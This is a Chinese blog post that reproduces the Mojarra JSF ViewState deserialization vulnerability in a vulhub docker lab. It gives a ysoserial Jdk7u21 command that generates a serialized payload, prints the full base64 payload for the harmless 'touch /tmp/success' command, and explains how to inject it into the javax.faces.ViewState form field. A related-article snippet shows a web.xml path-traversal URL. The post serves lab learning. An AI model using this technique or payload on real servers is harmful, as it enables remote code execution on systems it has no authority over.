vulhub漏洞复现39_Mojarra

最新推荐文章于 2022-11-02 20:34:00 发布
最新推荐文章于 2022-11-02 20:34:00 发布
阅读量665 收藏
点赞数
文章标签: 安全 服务器 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122837416
版权

Mojarra JSF ViewState 反序列化漏洞

漏洞详情

JavaServer Faces (JSF) 是一种用于构建 Web 应用程序的标准,Mojarra是一个实现了JSF的框架。在其2.1.29-08、2.0.11-04版本之前,没有对JSF中的ViewState进行加密,进而导致攻击者可以构造恶意的序列化ViewState对象对服务器进行攻击。

环境搭建

靶场:192.168.4.10_ubuntu

执行如下命令启动一个使用了JDK7u21和mojarra 2.1.28的JSF应用:

#docker-compose up -d

环境启动后,访问`http://your-ip:8080`即可查看到demo页面。

漏洞复现

JSF的ViewState结构如下:

 

 

根据这个结构,我们使用ysoserial的Jdk7u21利用链来生成一段合法的Payload:

```

$java -jar ysoserial.jar Jdk7u21 "touch /tmp/success" | gzip | base64 -w 0

H4sIAAAAAAAAA61WSW8cRRR+NWPPjIdxvMRrQpIJSfAC6XZsjxfGkHjBycAYW4zjSMzBlHvKnk56S3e13UYiN34AQuEfAJEwh1xIlANSxC3hgoQECooEF27AIULiwvKqu+2xbBNPQlrqruq31Xuvvnr1Nn6FWseG9st0lUouVzUprxpXWOkCdcoFxn/Qvn/n+sPeoxEAz4amilTIvzP1wfWPb98ajCLfWksBQOPZcyCeCFp9RTF1yXENybRXJGpRpcwkj2rUkFSDM9ugmuQ5GlckblNPmme6pVHOnByOdZdm7xobnw9EIZaD+kXVKDGDv+XqS8zOwYFFVDAcjfEc0r0iJBeX1jlTzBJzOESLxYkixBYVjTr421zMC7dlXHZFnhS0bB5qFw2qM2Ru4xW4rRoryGxaNF1uuXzONi1mc1UYbQsERexyhZ71LBHrP/i4tr/wm391tq6s/DgsEiZ4EaRHihMbj9r/jCXmfwrJsRv3/r7zFbL7YTQJUXghDsNxOBWHFwk0OsxWqbbAbEc1jYu5KQLkDQL1k6bhcGrwBaq5rPaL9EePPnz4+2sEYmOqoXKcRLt7FgjUTGIWCDTgNrIgX/N0SUNKc95U0CxF4/gfEmt4WXUIHCxwd2k+zOkcXddMWiKQyhkGs/2UMRTK5NcdM3BOtgIZJ0jIeVpaYdw5uYeVLIE6f7OWTVsnYHfnERMyYkJGTMgBJmQfE/ImJmQfE/LU7Ey2uKe0rlVkA3/U95gtF8Ip5Zi3C9QoaczOipQkSqbi6ogfAqefaHlULQd2MPyJ/+8MgeTrnsIsQXPi0EXg0yfLx74elLguT83PjHuqk0MS5aa9v1JVOVRDcwIHT+MFgXiYSwLjzyKTBdO1FTatChinQgRK4pCmIAnPxaGbwMBTAJbAuWp3xHYNrupMHl9yEOIK37REoMUvFqpZcd4/baPVWt60tIUWAsf2iQW3aEzRwlLQVKlqbwdOxqEXc4aC4T+B1u6e/C6xbApehtNJeAkkrBjcdJVyWua6hV4rCnOcBPRh0WAeUwh0de8unttNYpkUKmiyHwaEyUGsYgVOlSsz1Arrz9FKVHNrWGzODAwPDA6O9I/0ZYYGRzIE0vnHS2ThOESwgqJX+B6CWojhGBeVFxI+DcGAX3E1yTgSHGt7bwG56YvU4zfmE/vgAH5TgQA0wAiOWBihBaWE8ll8o4K2UzHjK6YDZqgoZq3Q5vMJtEMHanTiPPBRmD0cms351D3MjvpmewPmnmafhyOoIWZH4RguX1kgAT1bQZ9EjpBq+AyiJH8b5OYzX0Lm0k1fccgPigiJtL/+cWjCMYmsCJyARqhzr8I1tAXku60b67C4sVrj0B6Hjjh0VntjXf1F/W1MP9/xbG6s6LRp7rqhTu17Q6FWNbXjEIETVZjC0Ctwn126zJT/Pvv7nd/H4phUj+NXd+C42ecf9L8t23a3TeyuxaEGT5VtrRHwnPd9TBwR/nsSlmNp6+Ku9GbeZq8oYpZstqxh0BIedW/9564H6W8aJ+9HgOSBlDluRyU7oaScM1ZxU7eXcs/CTrFfdImb1qhhmNyXkca3prsUL977o6H1/rVPIhDJQ0pnAjg+0rBba9jWrWGxwZ6uhq9b2O817eoF/eV3NLaoUht/cPfrtne/xaMxDUmxXdNY4U1sPut42WZO2dRKnhX2uqm1hOh8Rfo4JJYzNEOH+kbEyUl4q/Y+GYXK41nev1mDNoKQCwAA

```

然后,我们提交表单并抓包,修改其中`javax.faces.ViewState`字段的值为上述Payload(别忘了URL编码):

 

`touch /tmp/success`已成功执行:

 

Revenge_scan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mojarra JSF ViewState 反序列化漏洞
0xSec
01-10 1492
JavaServer Faces,新一代的Java Web应用技术标准,吸收了很多Java Servlet以及其他的Web应用框架的特性。JSF为Web应用开发定义了一个事件驱动的、基于组件的模型。其中最常用的是Sun(在的Oracle)发布的Mojarra和Apache发布的MyFacesJavaServerFaces(JSF)概念在几年前就已经引入,在主要在J2EE中使用。
mojarra-1.2_14-binary.zip
03-08
JSF RI 稳定版本 mojarra-1.2_14-binary.zip 稳定版本
mojarra-1.2_10-b01-FCS-binary
05-13
mojarra-1.2_10-b01-FCS-binarymojarra-1.2_10-b01-FCS-binarymojarra-1.2_10-b01-FCS-binary
JSF 2.0 (Mojarra 2.0.2-FCS)
10-11
放一下lib在这里,供学习JSF 2.0的朋友们下载,免得大家跑到国外去下载
mojarra:Eclipse Mojarra实了Jakarta Faces
03-27
Mojarra 4.0在制品 Eclipse的Jakarta Faces规范的实 最低要求 Java 1.8 雅加达Servlet 5.0 雅加达表达语言4.0 CDI 3.0 雅加达标准标签库2.0 Jakarta JSON Processing 2.0(可选,仅当使用<f> ) Jakarta Validation 3.0(可选,仅当使用<f>或<f> ;建议使用2.0) 明确需要CDI,因为自Jakarta Faces 2.3起,不赞成使用javax.faces.bean.*批注(例如@ManagedBean ,而在4.0中已将其删除。 一些隐式的Jakarta表达式语言对象是通过CDI生产者产生的,而<f>通过CDI管理Jakarta WebSocket会话和事件。
Mojarra JSF ViewState 反序列化漏洞
EC_Carrot的博客
07-13 645
漏洞 我们使用ysoserial的Jdk7u21利用链来生成一段payload: java -jar ysoserial.jar Jdk7u21 "touch /tmp/success" | gzip | base64 -w 0 我这里用的是vulhub的环境,访问your_ip:8080可以看到demo页面 抓包后修改javax.faces.ViewState的值为payload,payload记得要url编码 返回容器查看 ...
Hibernate及JSF框架漏洞
小小猪的博客
08-18 1186
Hibernate框架漏洞 Hibernate框架中的HQL注入漏洞 Hibernate是一种ORMapping框架,内部可以使用原生SQL还有HQL语言进行SQL操作。 所谓的HQL注入,就是指在Hibernate中没有对数据进行有效的验证导致恶意数据进入应用程序中造成的。 请看这段代码: Input参数即可造成注入。 不过在Hibernate中,一般都是在createQuery中使用PDO,使用setString填充占位符进行sql语句的拼接,如果是这样的话,自然就不存在SQL注入.
漏洞扫描工程访问地址+javax.faces.resource.../WEB-INF/web.xml.jsf
qq_31030397的博客
08-28 3780
直接访问下面地址 http://ip访问地址/twbpm/javax.faces.resource…/WEB-INF/web.xml.jsf 可访问到web.xml的具体配置信息:如图 解决方案:在web.xml文件中配置 javax.faces.RESOURCE_EXCLUDES .xhtml .class .jsp .jspx .properties .xml ...
常见安全漏洞及整改建议
sjh_c513的专栏
12-09 4360
1. HTML表单没有CSRF保护 1.1 问题描述: CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买
mojarra_web项目需要的包_jsf-impl.jar_
09-29
jsf-api.jar、jsf-impl.jar
[ vulhub漏洞篇 ] vulhub 漏洞集合(含漏洞文章连接)
热门推荐
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部,欢迎持续订阅 我也会不定期再中间更新文章链接 目的:以 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
学习笔记-nuclei
人饭子的博客
11-02 1940
nuclei 非常优秀的漏洞扫描工具,值得学习! 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 项目地址 projectdiscovery/nuclei 语法规则 https://nuclei.projectdiscovery.io/templating-guide https://nuclei.projectdisco...
Nginx location 语法匹配详解,渗透漏洞WEB-INF文件泄露修
u014644574的博客
12-14 910
1、语法规则,类似switch case location [=|~|~*|^~|!~|!~*] /uri/ { … } 模式 含义 location = /uri = 表示精确匹配 location ^~ /uri ^ 进行前缀匹配,~ 表示区分大小写 location ~ pattern ~ 区分大小写的匹配 location
框架:闲谈JavaServer Faces的解决方案
kinglino520的专栏
07-23 332
 当我们点击其中一个edit时,我们打开editname.jsp来编辑选中的用户姓名。问题来了,如何在显示网页之前,先将First name及Last name的值设好?可有两种解决方案。第一种静态绑定。这是从网页开发者的角度为出发点,将editname.jsp文件中First name与Last name的域与某个backingbean的属性相绑定,然后在跳转页面前在
JavaServer Faces 2.0 can not be installed解决方案
wangchaoqi1985的博客
01-03 122
JavaServer Faces 2.0 can not be installed解决方案
Javaserver Faces 简介 — 什么是 JSF?
编程资料大全
11-09 219
Javaserver Faces 简介 — 什么是 JSF? 作者:Chris Schalk,Oracle Corporation2005 年 4 月 什么是 JSF? JavaServer Faces (JSF) 是一种用于构建 Web 应用程序的新标准 Java 框架。它提供了一种以组件为中心来开发 Java Web 用户界面的方法,从而简化了开发。JavaServer Faces 还引起了广...
kali中如何下载jsf
最新发布
04-16
2. 安装JSF的开发包(Mojarra): ``` sudo apt install libmojarra-java ``` 3. 下载JSF的示例应用程序(例如,HelloWorld): ``` sudo apt install libmojarra2-java-doc ``` 4. 进入示例应用程序的目录...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值